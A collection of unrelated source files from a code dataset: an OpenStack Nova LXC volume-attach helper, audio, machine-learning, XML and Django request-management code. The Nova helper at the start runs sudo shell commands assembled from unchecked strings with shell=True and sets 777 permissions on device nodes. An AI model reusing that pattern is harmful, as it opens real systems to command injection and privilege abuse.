%s\" % (perm, dev_whitelist)\n LOG.info(_('attach_volume: cmd(%s)') % cmd)\n subprocess.Popen(cmd, shell=True)\n\n cmd_lxc = 'sudo lxc-attach -n %s -- ' % init_pid\n # check if 'mountpoint' already exists\n\n LOG.info(_('attach_volume: mountpoint(%s)') % mountpoint)\n dev_key = init_pid + mountpoint\n LOG.info(_('attach_volume: dev_key(%s)') % dev_key)\n if dev_key in lxc_mounts:\n LOG.info(_('attach_volume: dev_key(%s) is already used') \\\n % dev_key)\n raise Exception(_('the same mount point(%s) is already used.')\\\n % mountpoint)\n\n # create device(s) for mount\n # sudo lxc-attach -n pid -- mknod -m 777\n # b \n cmd = '/bin/mknod -m 777 %s b %d %d '\\\n % (mountpoint, major_num, minor_num)\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n # create a directory for mount\n cmd = '/bin/mkdir -p /vmnt '\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n # create a sub-directory for mount\n found = 0\n for n in range(0, 100):\n dir_name = '/vmnt/vol' + str(n)\n cmd = cmd_lxc + '/bin/ls ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n p = subprocess.Popen(cmd, shell=True, \\\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n x = p.communicate()\n LOG.info(_('attach_volume: return x[0](%s)') % x[0])\n LOG.info(_('attach_volume: return x[1](%s)') % x[1])\n #if len(x[1]) > 5: # new \"No such file exists...\"\n s = x[1].lower()\n if (len(s) > 0 and s.find('no such') >= 0):\n # new \"No such file exists...\"\n cmd = cmd_lxc + ' /bin/mkdir ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n found = 1\n break\n if found == 0:\n cmd = '/bin/rm %s ' % (mountpoint)\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n raise Exception(_('cannot find mounting directories'))\n\n lxc_mounts[dev_key] = dir_name\n cmd = cmd_lxc + '/bin/chmod 777 ' + mountpoint\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n # mount\n cmd = cmd_lxc + ' /bin/mount ' + mountpoint + ' ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n p = subprocess.Popen(cmd, shell=True, \\\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n x = p.communicate()\n\n # change owner\n user = FLAGS.user\n user = user.rsplit(\"/\")\n user = user[len(user) - 1]\n cmd = '/bin/chown %s /vmnt' % user\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n cmd = '/bin/chown %s %s ' % (user, dir_name)\n cmd = cmd_lxc + cmd\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n cmd = cmd_lxc + \" /bin/chmod 'og+w' \" + ' ' + dir_name\n LOG.info(_('attach_volume: cmd (%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n\ndef detach_volume_lxc(self, connection_info, instance_name, \\\n mountpoint, virt_dom):\n # get id of the virt_dom\n spid = str(virt_dom.ID())\n LOG.info(_('detach_volume: pid(%s)') % spid)\n\n # get PID of the init process\n ps_command = subprocess.Popen(\"ps -o pid --ppid %s --noheaders\" \\\n % spid, shell=True, stdout=subprocess.PIPE)\n init_pid = ps_command.stdout.read()\n init_pid = str(int(init_pid))\n retcode = ps_command.wait()\n assert retcode == 0, \"ps command returned %d\" % retcode\n\n dev_key = init_pid + mountpoint\n if dev_key not in lxc_mounts:\n raise Exception(_('no such process(%(init_pid)s) or ' \\\n 'mount point(%(mountpoint)s)') % locals())\n dir_name = lxc_mounts[dev_key]\n\n LOG.info(_('detach_volume: init_pid(%s)') % init_pid)\n cmd_lxc = 'sudo lxc-attach -n %s -- ' % str(init_pid)\n cmd = cmd_lxc + ' /bin/umount ' + dir_name\n LOG.info(_('detach_volume: cmd(%s)') % cmd)\n p = subprocess.Popen(cmd, shell=True, \\\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n x = p.communicate()\n cmd = cmd_lxc + ' /bin/rmdir ' + dir_name\n LOG.info(_('detach_volume: cmd(%s)') % cmd)\n subprocess.call(cmd, shell=True)\n\n del lxc_mounts[dev_key] # delete dictionary entry\n\n cmd = cmd_lxc + ' /bin/rm ' + mountpoint\n LOG.info(_('detach_volume: cmd(%s)') % cmd)\n subprocess.call(cmd, shell=True)\n","sub_path":"nova/virt/gpu/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467547557","text":"#!/usr/bin/env python3\n\n\"\"\" 音声情報処理 n本ノック !! \"\"\"\n\n# Copyright (C) 2020 by Akira TAMAMORI\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# Commentary:\n# - PySoXを用いた音声情報処理シリーズ\n# - エコーをかける\n\nimport sox\n\nIN_WAVE_FILE = \"in.wav\" # 入力音声\nOUT_WAVE_FILE = \"echo.wav\" # エコー済み音声\n\n# create trasnformer (単一ファイルに対する処理)\ntransformer = sox.Transformer()\n\n# エコー の パラメタ\nn_echos = 2 # エコー回数\ndelays = [375] # 遅延時間 (ms)\ndecays = [0.5] # 減衰率\n\n# エコー回数分、遅延時間と減衰率を与える必要がある\n# → エコー回数に等しい長さの「リスト」を 遅延時間と減衰率それぞれで用意する\n# → n_echos が 2 なら遅延時間は [375, 750], 減衰率は [0.5, 0.25]\nfor i in range(1, n_echos):\n delays.append(delays[0] * (i + 1)) # 遅延時間は線形的\n decays.append(decays[0] ** (i + 1)) # 減衰率は指数的\n\n# エコーをかける\ntransformer.echo(n_echos=n_echos, delays=delays, decays=decays)\ntransformer.build(IN_WAVE_FILE, OUT_WAVE_FILE)\n","sub_path":"Chapter2_SoundEffect/pysox_echo.py","file_name":"pysox_echo.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578511372","text":"import os\nimport torch\n\ndef load_checkpoint(filename,model):\n if os.path.isfile(filename):\n print(\"=> loading checkpoint '{}'\".format(filename))\n checkpoint = torch.load(filename, map_location='cpu') # ,map_location='cpu'\n model.load_state_dict(checkpoint['state_dict'])\n print(\"=> loaded checkpoint '{}'\".format(filename))\n else:\n print(\"=> no checkpoint found at '{}'\".format(filename))\n return model\n","sub_path":"vote_agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359038619","text":"def getHighestCount(string):\n\n \"\"\"\n A program to check which player would win a match if player1 has substrings starting with vowels\n or if player2 has substrings starting with consonants\n \"\"\"\n\n\n vowel_string = ['A', 'E', 'I', 'O', 'U']\n string_length = len(string)\n\n\n # Players\n kevin_count = 0\n stuart_count = 0\n\n\n for char in range(string_length):\n if(string[char] in vowel_string):\n kevin_count += (string_length - char)\n else:\n stuart_count += (string_length - char)\n\n if (kevin_count > stuart_count):\n print(\"Kevin \" + str(kevin_count))\n elif(stuart_count > kevin_count):\n print(\"Stuart \" + str(stuart_count))\n else:\n print(\"Draw\")\n\ngetHighestCount(\"BANANA\")","sub_path":"MinionGame.py","file_name":"MinionGame.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268489771","text":"\"\"\" module to methods xml file \"\"\"\n\nimport logging\nimport itertools\n\nfrom lxml import etree\nfrom xml.dom.minidom import parseString\n\nfrom documentstore_migracao import config\nfrom documentstore_migracao.utils import string, convert_html_body, files\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef str2objXML(_string):\n _string = string.normalize(_string)\n try:\n parser = etree.HTMLParser(remove_blank_text=True, recover=True)\n return etree.fromstring(\"%s\" % (_string), parser=parser)\n except etree.XMLSyntaxError as e:\n logger.exception(e)\n return etree.fromstring(\"\")\n\n\ndef file2objXML(file_path):\n return loadToXML(file_path)\n\n\ndef objXML2file(file_path, obj_xml, pretty=False):\n files.write_file_binary(\n file_path,\n etree.tostring(\n obj_xml,\n doctype=config.DOC_TYPE_XML,\n xml_declaration=True,\n method=\"xml\",\n encoding=\"utf-8\",\n pretty_print=pretty,\n ),\n )\n\n\ndef prettyPrint_format(xml_string):\n return parseString(xml_string).toprettyxml()\n\n\ndef loadToXML(file):\n \"\"\"Parses `file` to produce an etree instance.\n\n The XML can be retrieved given its filesystem path,\n an URL or a file-object.\n \"\"\"\n parser = etree.XMLParser(remove_blank_text=True, no_network=True)\n xml = etree.parse(file, parser)\n return xml\n","sub_path":"documentstore_migracao/utils/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"270319621","text":"from keras import layers, models\nfrom keras import datasets\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import ticker\nfrom keras.utils import plot_model\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport numpy as np\n\nbatch_size = 64\nepochs = 100\nlatent_dim = 256\nnum_samples = 10000 #학습 데이터 개수\ndata_path = \"seq2seq_keras/data/Corpus10/eng2kor.txt\"\n\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\n\nwith open(data_path, 'r', encoding='utf-8') as f:\n lines = f.read().split(\"\\n\")\n\nfor idx, line in enumerate(lines[: min(num_samples, len(lines) - 1)]):\n if len(line.split(\"\\t\")) < 2 :\n continue\n input_text, target_text = line.split(\"\\t\")[:2]\n target_text = \"\\t\" + target_text + \"\\n\"\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n if char not in input_characters:\n input_characters.add(char)\n for char in target_text:\n if char not in target_characters:\n target_characters.add(char)\n\ninput_characters = sorted(list(input_characters))\ntarget_characters = sorted(list(target_characters))\nnum_encoder_tokens = len(input_characters)\nnum_decoder_tokens = len(target_characters)\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\n#문자 -> 숫자 변환용 사전\ninput_token_index = dict([(char, i) for i, char in enumerate(input_characters)])\ntarget_token_index = dict([(char, i) for i, char in enumerate(target_characters)])\n\n#학습에 사용할 데이터를 담을 3차원 배열\nencoder_input_data = np.zeros((len(input_texts), max_encoder_seq_length, num_encoder_tokens), dtype='float32')\ndecoder_input_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\ndecoder_target_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\n\n# 문장을 문자 단위로 원핫 인코딩하면서 학습용 데이터를 만듬\nfor i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)) :\n for t, char in enumerate(input_text):\n encoder_input_data[i, t, input_token_index[char]] = 1.\n for t, char in enumerate(target_text):\n decoder_input_data[i, t, target_token_index[char]] = 1.\n if t > 0:\n decoder_target_data[i, t-1, target_token_index[char]] = 1.\n\n# 인코더 생성\nencoder_inputs = layers.Input(shape=(None, num_encoder_tokens))\nencoder_outputs, state_h, state_c = layers.LSTM(latent_dim, return_state=True)(encoder_inputs) #출력은 사용하지 않는다.\nencoder_states = [state_h, state_c]\n\n# 디코더 생성\ndecoder_inputs = layers.Input(shape=(None, num_decoder_tokens))\ndecoder_outputs, _, _ = layers.LSTM(latent_dim, return_sequences=True, return_state=True)(decoder_inputs, initial_state=encoder_states)\ndecoder_outputs = layers.Dense(num_decoder_tokens, activation='softmax')(decoder_outputs)\n\n# 모델생성/훈련\nmodel = models.Model([encoder_inputs, decoder_inputs], decoder_outputs)\nmodel.summary()\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy')\ncallbackList = [\n EarlyStopping(patience=7, monitor='val_loss'),\n ModelCheckpoint(filepath='seq2seq_train_model.h5', monitor='val_loss', save_best_only=True)\n\n]\nmodel.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=batch_size, epochs=epochs, validation_split=0.2, verbose=2, callbacks=callbackList)\n\n# 추론(테스트)\n\n# 추론 모델 생성\nencoder_model = models.Model(encoder_inputs, encoder_states)\n\ndecoder_state_input_h = layers.Input(shape=(latent_dim,))\ndecoder_state_input_c = layers.Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\ndecoder_outputs, state_h, state_c = layers.LSTM(latent_dim, return_sequences=True, return_state=True)(decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = layers.Dense(num_decoder_tokens, activation='softmax')(decoder_outputs)\ndecoder_model = models.Model(\n [decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states\n)\n\n# 숫자 -> 문자 변환용 사전\nreverse_input_char_index = {i:char for char, i in input_token_index.items()}\nreverse_target_char_index = {i:char for char, i in target_token_index.items()}\n\ndef decode_sequence(input_seq) :\n # 입력 문장을 인코딩\n states_value = encoder_model.predict(input_seq)\n\n # 디코더의 입력으로 쓸 단일 문자\n target_seq = np.zeros((1,1, num_decoder_tokens))\n # 첫입력은 시작 문자인 '\\t'로 설정\n target_seq[0, 0, target_token_index['\\t']] = 1.\n\n # 문장 생성\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition :\n # 이전의 출력, 상태를 디코더에 넣어서 새로운 출력, 상태를 얻음\n # 이전 문자와 상태로 다음 문자와 상태를 얻는다고 보면 됨.\n output_tokens, h, c = decoder_model.predict([target_seq] + states_value)\n # 사전을 사용해서 원핫인코딩 출력을 실제 문자로 변환\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char\n\n # 종료 문자가 나왔거나 문장 길이가 한계를 넘으면 종료\n if (sampled_char == '\\n' or len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n\n # 디코더의 다음 입력으로 쓸 데이터 갱신\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n\n states_value = [h, c]\n\n return decoded_sentence\n\nfor seq_index in range(30) :\n input_seq = encoder_input_data[seq_index:seq_index+1]\n decoded_sentence = decode_sequence(input_seq)\n print('\"{}\" -> \"{}\"'.format(input_texts[seq_index], decoded_sentence.strip()))","sub_path":"seq2seq_keras/seq2seq_with_keras.py","file_name":"seq2seq_with_keras.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585832742","text":"# Given an array of integers and an integer k, you need to find the total number of continuous subarrays whose sum equals to k.\n#\n# Example 1:\n#\n#\n# Input:nums = [1,1,1], k = 2\n# Output: 2\n#\n#\n#  \n# Constraints:\n#\n#\n# \tThe length of the array is in range [1, 20,000].\n# \tThe range of numbers in the array is [-1000, 1000] and the range of the integer k is [-1e7, 1e7].\n#\n#\n\n\nclass Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n sums = 0\n freq = {}\n freq[sums] = 1\n ans = 0\n for i, ele in enumerate(nums):\n sums += ele\n if sums - k in freq:\n ans += freq[sums - k]\n freq[sums] = freq.get(sums, 0) + 1\n return ans\n","sub_path":"solutions/560-subarray-sum-equals-k/subarray-sum-equals-k.py","file_name":"subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551839117","text":"# encoding: utf-8\n\nimport traceback\nimport pandas as pd\n\nfrom tqdm import tqdm\nfrom pathlib import Path\n\nfrom typing import (\n List,\n Union,\n)\n\n\ndef load(path: Path, columns: Union[str, List[str]] = None) -> pd.DataFrame:\n \n if isinstance(columns, str):\n columns = [columns]\n elif (not isinstance(columns, List)) and columns is not None:\n raise ValueError(\n f\"type of columns unknown: {type(columns)}. \"\n f\"Should be one of a str or list[str].\"\n ) \n \n return _load(path, columns)\n\n\ndef _load(path: Path, columns: List[str]) -> pd.DataFrame:\n \n def load_dir(path: Path) -> pd.DataFrame:\n try:\n return pd.concat(load_file(p) for p in path.iterdir())\n except:\n # traceback.print_exc()\n pass\n \n def load_file(path: Path) -> pd.DataFrame:\n try:\n if path.name.startswith('chat_record'):\n return pd.read_csv(path, sep='\\t', header=None)\n except:\n pass\n \n df = pd.concat(load_dir(p) for p in tqdm(list(path.iterdir())))\n \n if 13 == len(df.columns):\n df.columns = [\n '_id',\n 'platform',\n 'server_id',\n 'role_uid',\n 'name',\n 'level',\n 'vip',\n 'target_uid',\n 'channel',\n 'msg_type',\n 'is_audio',\n 'chat_content',\n 'time',\n ]\n elif 27 == len(df.columns):\n df.columns = [\n '_id',\n 'platform',\n 'server_id',\n 'role_uid',\n 'role_name',\n 'role_level',\n 'role_vip',\n \n 'target_uid',\n 'target_name',\n 'target_level',\n 'target_vip',\n \n 'channel',\n 'msg_type',\n 'is_audio',\n 'chat_content',\n 'time',\n \n 'role_is_ai',\n 'target_is_ai',\n 'role_corpus_id',\n 'role_corpus_title',\n 'role_country_id',\n 'role_country_title',\n 'target_corpus_id',\n 'target_corpus_title',\n 'target_country_id',\n 'target_country_title',\n 'charge',\n ]\n else:\n raise ValueError(f'Expected 13 or 27 fields, Now get {len(df.columns)} fields')\n \n df['chat_content'] = df['chat_content'].apply(lambda x: x[1:-1] if \"'\"==x[0] and \"'\"==x[-1] else x)\n \n return df if columns is None else df[columns]\n\n\nif __name__ == '__main__':\n # path = Path('~/data/yk-zhanguo-chat/tw').expanduser()\n path = Path('~/data/yk-zhanguo-chat/dl').expanduser()\n path\n \n df = load(path, columns='chat_content')\n df.head(3)\n","sub_path":"ads/train/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66927598","text":"\"\"\"\nSuper class for the data handler\n\"\"\"\nfrom typing import Any\n\n\nclass DataHandlerSuper:\n def __init__(\n self: Any,\n fpg_connector: Any = None,\n database: Any = None\n ) -> None:\n self.fpg_connector = fpg_connector\n self.database = database\n self.current_time = None\n self.current_price = None\n","sub_path":"lib/py/fpg/data_manager/data_manager_parent.py","file_name":"data_manager_parent.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"477457222","text":"from .models import Request, WorkType, Inventory, Equipment, ExecutionStatus, RefuseReason\nfrom usersapp.models import Location, Department, Pavilion, Room, UserProfile\nfrom django.views import generic\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom django.db import transaction\nfrom .forms import RequestForm, RequestDoneCommentForm, RefuseForm, FilteringForm\nfrom usersapp.forms import LocationForm\nfrom django.http import Http404, QueryDict\nfrom .functions import fetch_location_from_form, dispatcher_fields_handling\nfrom .functions import work_type_inventory_equipment_fields_handling\nfrom .functions import prepare_applicants_location_f, filter_requests\nimport datetime\nfrom django.http import HttpResponse\n\nUSER = get_user_model()\n\n# Отображение на основе базового класса.\nclass RequestListView(LoginRequiredMixin, generic.ListView):\n \"\"\" Для вывода списка заявок на основной странице сайта. \"\"\"\n model = Request\n paginate_by = 14\n context_object_name = 'requests'\n template_name = 'requestsapp/requests.html'\n queryset = Request.objects.order_by('-last_change_date')\n\n def get_queryset(self):\n # Для исполнителей выводить только заявки, ожидающие начала выполнения.\n if self.request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists():\n return super(RequestListView, self).get_queryset().filter(execution_status__status=settings.WAITING_FOR_START)\n \n # Заявителям выводить только созданные ими заявки.\n elif self.request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n return super(RequestListView, self).get_queryset().filter(creator=self.request.user)\n \n # Для диспетчеров учитывать параметры фильтрации списка заявок.\n elif self.request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n # Сначала получаем весь список заявок, используя метод базового класса.\n requests = super(RequestListView, self).get_queryset()\n # По завершению фильтрации вызывать метод базового класса.\n return filter_requests(requests, self.request.GET)\n else:\n return super(RequestListView, self).get_queryset()\n\n def get_context_data(self, **kwargs):\n context = super(RequestListView, self).get_context_data(**kwargs)\n context['filtering_form'] = FilteringForm(initial={\n 'by_exexution_or_refuse_date_start': self.request.GET.get('by_exexution_or_refuse_date_start'),\n 'by_exexution_or_refuse_date_end': self.request.GET.get('by_exexution_or_refuse_date_end'),\n 'by_creator': self.request.GET.get('by_creator'),\n })\n if self.request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n requests = Request.objects.all()\n context['most_recent_request_pk'] = requests.first().pk\n context['requests_list_length'] = requests.count()\n elif self.request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists():\n requests = Request.objects.filter(execution_status__status=settings.WAITING_FOR_START).all()\n context['most_recent_request_pk'] = requests.first().pk\n context['requests_list_length'] = requests.count()\n q_dict = self.request.GET.dict()\n if 'page' in q_dict:\n q_dict.pop('page')\n q = QueryDict(mutable=True)\n q.update(q_dict)\n # HTTPparameters служит для передачи HTTP-параметров в навигационные ссылки.\n context['HTTPparameters'] = '?' + q.urlencode() + '&' if len(q) > 0 else '?' + q.urlencode()\n return context\n\n\nclass RequestDetailView(LoginRequiredMixin, generic.DetailView):\n model = Request\n template_name = 'requestsapp/request_detail.html'\n\n def get(self, request, *args, **kwargs):\n \"\"\" Переопределение метода базового класса для реализации проверок. \"\"\"\n\n \"\"\" Проверка, что заявители обращаются к созданной ими заявке, а если к чужой,\n то реализовать перенаправление на страницу \"ваши заявки\".\n Соответственно, диспетчер и исполнители могут просматривать все заявки, но\n исполнители видят меньше сведений, что реализуется проверками в шаблоне. \"\"\"\n if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists() and self.get_object().creator != request.user:\n return redirect('requests')\n elif request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists() and \\\n self.get_object().execution_status != ExecutionStatus.objects.get_or_create(status=settings.WAITING_FOR_START)[0]:\n if self.get_object() != request.user.userprofile.taken_request:\n return redirect('requests')\n # Причина повтора кода из метода базового класса -- использование super приводило к ошибке.\n self.object = self.get_object()\n context = self.get_context_data(object=self.object)\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n \"\"\" Переопределение метода для добавления значения статуса-константы в контекст. \"\"\"\n # Получаем базовую реализацию контекста.\n context = super(RequestDetailView, self).get_context_data(**kwargs)\n # Чтобы значение константы определялось в одном месте, а не повторялось.\n context['waiting_status_const'] = ExecutionStatus.objects.get_or_create(\n status=settings.WAITING_FOR_START)[0].status\n context['changed'] = True if context['request'].last_change_date - \\\n context['request'].submission_date > datetime.timedelta(seconds=1) else False\n return context\n\n\n@login_required\n@transaction.atomic\n@permission_required('requestsapp.add_request')\ndef request_new(request):\n if request.method == 'POST':\n request_f = RequestForm(request.POST)\n location_f = LocationForm(request.POST)\n if request_f.is_valid() and location_f.is_valid():\n # service - чтобы не было путаницы с параметром request.\n new_service_request = request_f.save(commit=False)\n\n # Назначить создателя.\n new_service_request.creator = request.user\n # Назначить статус ожидания начала работ.\n if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n new_service_request.execution_status = ExecutionStatus.objects.get_or_create(\n status=settings.WAITING_FOR_START)[0]\n # Назначить заявителем создателя, если создатель из группы заявителей, а не диспетчеров.\n if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n new_service_request.applicant_profile = request.user.userprofile\n \n # Диспетчеры.\n if request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n dispatcher_fields_handling(request, request_f, location_f, new_service_request)\n # Требует размышления о необходимости.\n new_service_request.last_change_date = new_service_request.submission_date\n # Заявители.\n else:\n new_service_request.submission_date = timezone.now()\n # Когда пользователь-заявитель отметил чекбокс с именем use_applicant_loc.\n if request.POST.get('use_applicant_loc', False):\n # Создается или извлекается объект местоположения Location.\n new_service_request.location = request.user.userprofile.create_or_fetch_location_object()[0]\n else:\n new_service_request.location = fetch_location_from_form(location_f)\n\n work_type_inventory_equipment_fields_handling(request_f, new_service_request)\n new_service_request.save()\n return redirect('request_detail', str(new_service_request.pk))\n else:\n request_f = RequestForm()\n location_f = prepare_applicants_location_f(request, False, None)\n\n return render(request, 'requestsapp/request_edit.html', {\n 'request_f': request_f,\n # См. пояснения о ключе 'form' в шаблоне location_fields.html.\n 'form': location_f,\n })\n\n\n@login_required\n@transaction.atomic\n@permission_required('requestsapp.change_request')\ndef request_edit(request, pk):\n changing_service_request = get_object_or_404(Request, pk=pk)\n\n if changing_service_request.creator != request.user:\n return redirect('request_detail', str(changing_service_request.pk))\n\n location = get_object_or_404(Location, pk=changing_service_request.location.pk)\n sub_date = changing_service_request.submission_date\n if request.method == 'POST':\n request_f = RequestForm(request.POST, instance=changing_service_request)\n location_f = LocationForm(request.POST)\n if request_f.is_valid() and location_f.is_valid():\n # service - чтобы не было путаницы с параметром request.\n changing_service_request = request_f.save(commit=False)\n\n # Назначить статус ожидания начала работ. Потому что для заявителей поле со статусом не выводится.\n if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n changing_service_request.execution_status = ExecutionStatus.objects.get_or_create(\n status=settings.WAITING_FOR_START)[0]\n\n # Диспетчеры.\n if request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n dispatcher_fields_handling(request, request_f, location_f, changing_service_request)\n # Заявители.\n else:\n changing_service_request.submission_date = sub_date\n # Когда пользователь-заявитель отметил чекбокс с именем use_applicant_loc.\n if request.POST.get('use_applicant_loc', False):\n # Создается или извлекается объект местоположения Location.\n changing_service_request.location = request.user.userprofile.create_or_fetch_location_object()[0]\n else:\n changing_service_request.location = fetch_location_from_form(location_f)\n work_type_inventory_equipment_fields_handling(request_f, changing_service_request)\n # TODO Проверить, что last_change_date обновляется при изменении.\n changing_service_request.save()\n return redirect('request_detail', str(changing_service_request.pk))\n else:\n if request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n request_f = RequestForm(instance=changing_service_request, initial={\n 'new_or_existing_inventory_number': changing_service_request.inventory.inventory_number,\n 'equipment': changing_service_request.inventory.equipment,\n 'created_by_disp_applicant_profile': changing_service_request.applicant_profile,\n })\n else:\n request_f = RequestForm(instance=changing_service_request, initial={\n 'new_or_existing_inventory_number': changing_service_request.inventory.inventory_number,\n 'equipment': changing_service_request.inventory.equipment\n })\n location_f = prepare_applicants_location_f(request, True, changing_service_request.location)\n\n return render(request, 'requestsapp/request_edit.html', {\n 'request_f': request_f,\n # См. пояснения о ключе 'form' в шаблоне location_fields.html.\n 'form': location_f,\n 'editing': True\n })\n\n\n@login_required\n@transaction.atomic\n@permission_required('requestsapp.delete_request')\ndef request_delete(request, pk):\n try:\n deleting_request = Request.objects.get(pk=pk)\n except Request.DoesNotExist:\n raise Http404\n else:\n deleting_request.delete()\n return redirect('requests')\n\n\n@login_required\n@transaction.atomic\ndef request_take(request, pk):\n if not request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists():\n return redirect('requests')\n else:\n taking_request = get_object_or_404(Request, pk=pk)\n request.user.userprofile.taken_request = taking_request\n request.user.userprofile.save()\n \n taking_request.execution_status = ExecutionStatus.objects.get_or_create(status=settings.IN_PROGRESS)[0]\n taking_request.save()\n return redirect('requests')\n\n\n@login_required\n@transaction.atomic\ndef request_execute(request):\n if not request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists() or not request.user.userprofile.taken_request:\n return redirect('requests')\n else:\n if request.method == 'POST':\n form = RequestDoneCommentForm(request.POST)\n if form.is_valid():\n taken_request = request.user.userprofile.taken_request\n taken_request.execution_status = ExecutionStatus.objects.get_or_create(status=settings.DONE)[0]\n taken_request.executor_comment = form.cleaned_data['executor_comments']\n taken_request.executor = request.user\n taken_request.execution_or_refuse_date = timezone.now()\n taken_request.save()\n request.user.userprofile.taken_request = None\n request.user.userprofile.save()\n return redirect('requests')\n\n\n@login_required\n@transaction.atomic\ndef request_refuse(request):\n if not request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists() or not request.user.userprofile.taken_request:\n return redirect('requests')\n else:\n if request.method == 'POST':\n form = RefuseForm(request.POST)\n if form.is_valid():\n taken_request = request.user.userprofile.taken_request\n taken_request.execution_status = 